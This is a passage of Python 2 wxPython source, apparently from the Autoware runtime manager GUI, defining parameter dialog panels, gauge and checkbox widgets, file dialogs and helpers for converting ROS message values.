def roslaunch_to_nodes(self, cmd):
try:
s = subprocess.check_output(cmd).strip()
return s.split('\n') if s != '' else []
except subprocess.CalledProcessError:
return []
def set_bg_all_tabs(self, col=wx.NullColour):
add_pnls = [
self,
# self.tree_ctrl_0,
# self.tree_ctrl_1,
# self.tree_ctrl_data
]
for tab in self.all_tabs + add_pnls:
tab.SetBackgroundColour(col)
def get_autoware_dir(self):
dir = rtmgr_src_dir() + '../../../../../../'
return os.path.abspath(dir)
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def toggle_enable_obj(self, obj):
objs = []
pfs = [ 'button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_' ]
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [ eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', []) ]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def obj_name_split(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return (None, None)
return next( ( ( name[:len(pf)], name[len(pf):] ) for pf in pfs if name[:len(pf)] == pf ), None)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next( (name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [ self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key) ]
def name_get(self, obj):
return next( (nm for nm in dir(self) if getattr(self, nm) is obj), None)
def name_get_cond(self, obj, cond=(lambda s : True), def_ret=None):
return next( (nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def val_get(self, name):
obj = self.obj_get(name)
if obj is None:
return None
return obj.GetValue() if getattr(obj, 'GetValue', None) else None
def obj_get(self, name):
return getattr(self, name, None)
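# A var is shown in the current dialog type unless some other type's
# '<type>_dialog_only' list claims it, or the current type has a
# '<type>_dialog_allow' list that does not include it.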
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
only_chk = next( (False for (k,type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
allow_chk = next( (False for (k,type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam') )
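# Panel that renders all vars of a parameter definition (prm) as VarPanel rows,
# honoring gdic layout hints (show_order, topic/rosparam category boxes, nl and
# hline flags) and registering each VarPanel as the var's value source in gdic.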
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj( {'pdic':self.pdic, 'gdic':self.gdic, 'param':self.prm} )
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars : [ var for var in vars if var.get('name') == name ]
vars = reduce( lambda lst, name : lst + var_lst(name, vars), self.gdic.get('show_order'), [] )
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, 'rosparam : ' + var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [ [], 0 ])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[ k ] = self.gdic.get(k, []) + [ vp ]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get( self.prm.get('msg') )
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
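# One widget per parameter, chosen by var['kind']: radio_box, menu, checkbox,
# checkboxes, toggle_button, hide, path, str, or a numeric text control with an
# optional slider and inc/dec buttons when 'min'/'max' are given.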
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get( self.var.get('str_flags', []) )
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style)
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [ v, self.min, self.max, self.var['v'] ]
self.is_float = len( [ v_ for v_ in vlst if type(v_) is not int ] ) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40,27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40,29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
vszr.Add( self.create_bmbtn("inc.png", self.OnIncBtn) )
vszr.Add( self.create_bmbtn("dec.png", self.OnDecBtn) )
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def create_bmbtn(self, filename, hdr):
dir = rtmgr_src_dir()
bm = wx.Bitmap(dir + filename, wx.BITMAP_TYPE_ANY)
style = wx.BORDER_NONE | wx.BU_EXACTFIT
obj = wx.lib.buttons.GenBitmapButton(self, wx.ID_ANY, bm, style=style)
self.Bind(wx.EVT_BUTTON, hdr, obj)
return obj
def get_v(self):
if self.kind in [ 'radio_box', 'menu' ]:
return self.choices_sel_get()
if self.kind in [ 'checkbox', 'toggle_button' ]:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in [ 'path', 'str' ]:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int( self.int_max * (v - self.min) / self.w if self.w != 0 else 0 )
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def OnIncBtn(self, event):
step = self.get_step()
self.add_v(step)
def OnDecBtn(self, event):
step = self.get_step()
self.add_v(-step)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def add_v(self, step):
ov = self.get_v()
self.tc.SetValue(str(ov + step))
v = self.get_v()
if v != ov:
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in [ 'path' ]
class MyDialogParam(rtmgr.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogParam.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel( gdic.get(ok_lb_key) )
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogDPM(rtmgr.MyDialogDPM):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogDPM.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
parent = self.panel_v
frame = self.GetParent()
self.frame = frame
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnLink(self, event):
obj = event.GetEventObject()
dic = { self.hyperlink_car : self.frame.button_car_dpm,
self.hyperlink_pedestrian : self.frame.button_pedestrian_dpm }
obj = dic.get(obj)
if obj:
self.frame.OnHyperlinked_obj(obj)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogCarPedestrian(rtmgr.MyDialogCarPedestrian):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogCarPedestrian.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
frame = self.GetParent()
self.frame = frame
self.SetTitle(prm.get('name', ''))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnLink(self, event):
obj = event.GetEventObject()
car_ped = { self.hyperlink_car : 'car', self.hyperlink_pedestrian : 'pedestrian' }.get(obj, 'car')
obj_key = self.gdic.get('car_pedestrian_obj_key', {}).get(car_ped)
obj = getattr(self.frame, 'button_' + obj_key, None) if obj_key else None
if obj:
self.frame.OnHyperlinked_obj(obj)
self.EndModal(0)
def OnClose(self, event):
self.EndModal(-1)
class MyDialogLaneStop(rtmgr.MyDialogLaneStop):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogLaneStop.__init__(self, *args, **kwds)
self.frame = self.GetParent()
name = 'lane_stop'
var = next( ( var for var in self.prm.get('vars', []) if var.get('name') == name ), {} )
v = self.pdic.get( name, var.get('v', False) )
set_val(self.checkbox_lane_stop, v)
def update(self):
update_func = self.gdic.get('update_func')
if update_func:
update_func(self.pdic, self.gdic, self.prm)
def OnTrafficRedLight(self, event):
self.pdic['traffic_light'] = 0
self.update()
def OnTrafficGreenLight(self, event):
self.pdic['traffic_light'] = 1
self.update()
def OnTrafficLightRecognition(self, event):
pub = rospy.Publisher('/config/lane_stop', ConfigLaneStop, latch=True, queue_size=10)
msg = ConfigLaneStop()
v = event.GetEventObject().GetValue()
self.pdic['lane_stop'] = v
msg.manual_detection = not v
pub.publish(msg)
def OnOk(self, event):
self.EndModal(0)
def OnCancel(self, event):
self.EndModal(-1)
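# Small label + BarLabel gauge combo used for the per-CPU and memory displays;
# bar_set() switches to red colours once lmt_bar_prg is reached.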
class InfoBarLabel(wx.BoxSizer):
def __init__(self, parent, btm_txt=None, lmt_bar_prg=90, bar_orient=wx.VERTICAL):
wx.BoxSizer.__init__(self, orient=wx.VERTICAL)
self.lb = wx.StaticText(parent, wx.ID_ANY, '')
self.bar = BarLabel(parent, hv=bar_orient, show_lb=False)
bt = wx.StaticText(parent, wx.ID_ANY, btm_txt) if btm_txt else None
self.Add(self.lb, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bar_orient == wx.VERTICAL:
sz = self.bar.GetSize()
sz.SetWidth(20)
self.bar.SetMinSize(sz)
self.Add(self.bar, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bt:
self.Add(bt, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
else:
szr = wx.BoxSizer(wx.HORIZONTAL)
if bt:
szr.Add(bt, 0, 0, 0)
szr.Add(self.bar, 1, 0, 0)
self.Add(szr, 1, wx.EXPAND, 0)
self.lmt_bar_prg = lmt_bar_prg
def lb_set(self, txt, col):
self.lb.SetForegroundColour(col)
self.lb.SetLabel(txt)
self.Layout()
def bar_set(self, prg):
(col1, col2) = (wx.Colour(0,0,250), wx.Colour(0,0,128))
if prg >= self.lmt_bar_prg:
(col1, col2) = (wx.Colour(250,0,0), wx.Colour(128,0,0))
self.bar.set_col(col1, col2)
self.bar.set(prg)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [ wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n) ]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [ True for box in self.boxes ]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [ box.GetValue() for box in self.boxes ]
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL, show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250,250,250)
self.dflt_col2 = wx.Colour(128,128,128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w,h) = self.GetSize()
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h-p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w-p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h-p)
dc.GradientFillLinear(rect, wx.Colour(200,200,200), wx.Colour(220,220,220), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250,250,250), wx.Colour(250,250,250), self.dir)
class ColorLabel(wx.Panel):
def __init__(self, parent, lst=[], pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lst = lst
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, lst):
self.lst = lst
self.Refresh()
def OnPaint(self, event):
dc = wx.PaintDC(self)
dc.Clear()
#change_font_point_by_rate(dc, 0.75)
(x,y) = (0,0)
(_, h, _, _) = dc.GetFullTextExtent(' ')
for v in self.lst:
if type(v) is tuple and len(v) == 2:
(x,y) = v
elif type(v) is tuple and len(v) == 3:
dc.SetTextForeground(v)
elif v == '\n':
(x,y) = (0,y+h)
elif type(v) is str:
dc.DrawText(v, x, y)
(w, _, _, _) = dc.GetFullTextExtent(v)
x += w
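# Minimal stand-in that mimics the GetValue/SetValue interface of a wx control,
# used e.g. for per-camera pseudo check items that have no real widget.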
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = Final(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
def file_dialog(parent, tc, path_inf_dic=None):
path_inf_dic = path_inf_dic if path_inf_dic is not None else {}
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = { 'save' : wx.FD_SAVE, 'multi' : wx.FD_MULTIPLE }
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([ path + '/' + fn for fn in fns ])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = ( v , btn.IsEnabled() )
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = { wx.EVT_TOGGLEBUTTON.typeId : None,
wx.EVT_LEFT_DOWN.typeId : True,
wx.EVT_LEFT_UP.typeId : False }
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [ getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key ]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def load_yaml(filename, def_ret=None):
dir = rtmgr_src_dir()
path = dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def terminate_children(proc, sigint=False):
for child in psutil.Process(proc.pid).get_children():
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def th_start(target, kwargs=None):
kwargs = kwargs if kwargs is not None else {}
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j+1:]
return s
def change_font_point_by_rate(obj, rate=1.0):
font = obj.GetFont()
pt = font.GetPointSize()
pt = int(pt * rate)
font.SetPointSize(pt)
obj.SetFont(font)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def scaled_bitmap(bm, scale):
(w, h) = bm.GetSize()
img = wx.ImageFromBitmap(bm)
img = img.Scale(w * scale, h * scale, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(img)
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = { 'top' : wx.TOP, 'bottom' : wx.BOTTOM, 'left' : wx.LEFT, 'right' : wx.RIGHT,
'all' : wx.ALL, 'expand' : wx.EXPAND, 'fixed_minsize' : wx.FIXED_MINSIZE,
'center_v' : wx.ALIGN_CENTER_VERTICAL, 'center_h' : wx.ALIGN_CENTER_HORIZONTAL,
'passwd' : wx.TE_PASSWORD }
lst = [ dic.get(f) for f in flags if f in dic ]
return reduce(lambda a,b : a+b, [0] + lst)
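# Resolve a dotted path like 'twist.angular.z' against a ROS message, returning
# the parent object and the final attribute name; str_to_rosval() then converts
# a string to the matching Python type. Illustrative example (not from the source):
#   (obj, attr) = msg_path_to_obj_attr(msg, 'twist.angular.z')
#   setattr(obj, attr, str_to_rosval('1,5', 'float64'))  # -> 1.5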
def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return (obj, lst[-1])
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8':int , 'int16':int , 'int32':int ,
'uint8':int , 'uint16':int , 'uint32':int ,
'int64':long , 'uint64':long,
'float32':float, 'float64':float,
}
t = cvt_dic.get(type_str)
s = s.replace(',','.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def str_to_float(s):
return float( s.replace(',','.') )
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
